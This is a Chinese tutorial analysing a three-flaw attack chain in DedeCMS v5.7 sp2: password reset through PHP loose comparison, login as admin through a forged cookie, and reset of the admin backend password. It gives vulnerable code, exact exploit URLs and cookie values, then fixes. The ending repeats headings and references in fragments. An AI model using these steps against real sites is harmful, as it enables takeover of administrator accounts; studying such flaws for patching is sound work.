DedeCMS v5.7 sp2 漏洞组合拳分析与利用教学<\/h1>

漏洞概述<\/h2>

DedeCMS v5.7 sp2 存在三个关键漏洞组合：<\/p>

前台任意用户密码重置漏洞<\/li>
前台任意用户登录漏洞<\/li>

管理员前台可修改后台密码的安全问题<\/li> <\/ol>

这三个漏洞组合形成完整的攻击链，可重置管理员后台密码，最终获取系统控制权。<\/p>

漏洞详细分析<\/h2>

1. 前台任意用户密码重置漏洞<\/h3>

漏洞文件<\/strong>: member\/resetpassword.php<\/code><\/p>

关键代码<\/strong>:<\/p>

else<\/span> if<\/span>($dopost ==<\/span> "safequestion"<\/span>) {
<\/span><\/span>    $mid =<\/span> preg_replace<\/span>("#[^0-9]#"<\/span>, ""<\/span>, $id);
<\/span><\/span>    $sql =<\/span> "SELECT safequestion,safeanswer,userid,email FROM #@__member WHERE mid = '<\/span>$mid<\/span>'"<\/span>;
<\/span><\/span>    $row =<\/span> $db-><\/span>GetOne<\/span>($sql);
<\/span><\/span>    if<\/span>(empty<\/span>($safequestion)) $safequestion =<\/span> ''<\/span>;
<\/span><\/span>    if<\/span>(empty<\/span>($safeanswer)) $safeanswer =<\/span> ''<\/span>;
<\/span><\/span>    if<\/span>($row['safequestion'<\/span>] ==<\/span> $safequestion &&<\/span> $row['safeanswer'<\/span>] ==<\/span> $safeanswer) {
<\/span><\/span>        sn<\/span>($mid, $row['userid'<\/span>], $row['email'<\/span>], 'N'<\/span>);
<\/span><\/span>        exit<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞原理<\/strong>:<\/p>

数据库查询返回的 $row['safeanswer']<\/code> 为空，$row['safequestion']<\/code> 为0<\/li>
传入 $safeanswer<\/code> 为空即可满足条件<\/li>
传入 $safequestion=0.0<\/code> 利用PHP弱类型比较绕过判断（0.0 == 0）<\/li>
<\/ul>
利用步骤<\/strong>:<\/p>

访问URL:
\/member\/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanwser=&id=1
<\/code><\/pre>
<\/li>
系统生成临时密码并跳转到重置页面:
\/member\/resetpassword.php?dopost=getpasswd&id=1&key=[随机8位key]
<\/code><\/pre>
<\/li>
通过该URL重置管理员密码<\/li>
<\/ol>
2. 前台任意用户登录漏洞<\/h3>
漏洞文件<\/strong>: member\/index.php<\/code> 和 include\/memberlogin.class.php<\/code><\/p>
关键点<\/strong>:<\/p>

通过 member\/index.php?uid=0000001<\/code> 设置 last_vid<\/code> 和 last_vid__ckMd5<\/code> cookie<\/li>
利用 last_vid__ckMd5<\/code> 的值伪造 DedeUserID__ckMd5<\/code><\/li>
设置 DedeUserID=0000001<\/code> 和 DedeUserID__ckMd5=last_vid__ckMd5<\/code> 的值<\/li>
系统验证通过后，intval(0000001)<\/code> 得到 1<\/code>，即以管理员身份登录<\/li>
<\/ol>
详细流程<\/strong>:<\/p>

注册用户 0000001<\/code> 并通过审核<\/li>
访问:
\/member\/index.php?uid=0000001
<\/code><\/pre>
获取 last_vid__ckMd5<\/code> 值<\/li>
登录 0000001<\/code> 账号<\/li>
修改cookie:

设置 DedeUserID=0000001<\/code><\/li>
设置 DedeUserID__ckMd5=last_vid__ckMd5<\/code> 的值<\/li>
<\/ul>
<\/li>
刷新页面，以管理员身份登录前台<\/li>
<\/ol>
3. 重置管理员前后台密码<\/h3>
漏洞文件<\/strong>: member\/edit_baseinfo.php<\/code><\/p>
关键代码<\/strong>:<\/p>
$query1 =<\/span> "UPDATE `#@__member` SET pwd='<\/span>$pwd<\/span>',sex='<\/span>$sex<\/span>'<\/span>{<\/span>$addupquery}<\/span> where mid='"<\/span>.<\/span>$cfg_ml-><\/span>M_ID<\/span>.<\/span>"' "<\/span>;
<\/span><\/span>$dsql-><\/span>ExecuteNoneQuery<\/span>($query1);
<\/span><\/span>
<\/span><\/span>\/\/如果是管理员,修改其后台密码
<\/span><\/span><\/span><\/span>if<\/span>($cfg_ml-><\/span>fields<\/span>['matt'<\/span>]==<\/span>10<\/span> &&<\/span> $pwd2!=<\/span>''<\/span>){
<\/span><\/span>    $query2 =<\/span> "UPDATE `#@__admin` SET pwd='<\/span>$pwd2<\/span>' where id='"<\/span>.<\/span>$cfg_ml-><\/span>M_ID<\/span>.<\/span>"'"<\/span>;
<\/span><\/span>    $dsql-><\/span>ExecuteNoneQuery<\/span>($query2);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方法<\/strong>:<\/p>

使用前面漏洞获取的管理员前台账号<\/li>
修改密码时同时修改前后台密码<\/li>
<\/ol>
完整攻击链<\/h2>

利用前台任意密码重置漏洞重置管理员前台密码<\/li>
利用前台任意用户登录漏洞以管理员身份登录前台<\/li>
利用管理员权限修改前后台密码<\/li>
<\/ol>
修复方案<\/h2>

关闭会员功能（如不需要）<\/li>
注释以下代码（member\/index.php:163~164<\/code>）:
PutCookie<\/span>('last_vtime'<\/span>, $vtime, 3600<\/span>*<\/span>24<\/span>, '\/'<\/span>);
<\/span><\/span>PutCookie<\/span>('last_vid'<\/span>, $last_vid, 3600<\/span>*<\/span>24<\/span>, '\/'<\/span>);
<\/span><\/span><\/code><\/pre><\/li>
修改管理员后台地址为复杂路径<\/li>
及时关注官方更新并升级<\/li>
<\/ol>
总结<\/h2>
此漏洞组合展示了多个看似独立的小漏洞如何组合形成严重威胁。安全防护应：<\/p>

重视每一个小漏洞<\/li>
实施纵深防御策略<\/li>
定期进行安全审计<\/li>
及时更新补丁<\/li>
<\/ul>
参考资料<\/h2>

阿里云先知论坛<\/a><\/li>
FreeBuf专栏<\/a><\/li>
FormSec博客<\/a><\/li>
<\/ol>

DedeCMS v5.7 sp2 漏洞组合拳分析与利用教学<\/h1>

漏洞详细分析<\/h2>

参考资料<\/h2> 阿里云先知论坛<\/a><\/li> FreeBuf专栏<\/a><\/li> FormSec博客<\/a><\/li> <\/ol>

参考资料<\/h2>

阿里云先知论坛<\/a><\/li>
FreeBuf专栏<\/a><\/li>
FormSec博客<\/a><\/li> <\/ol>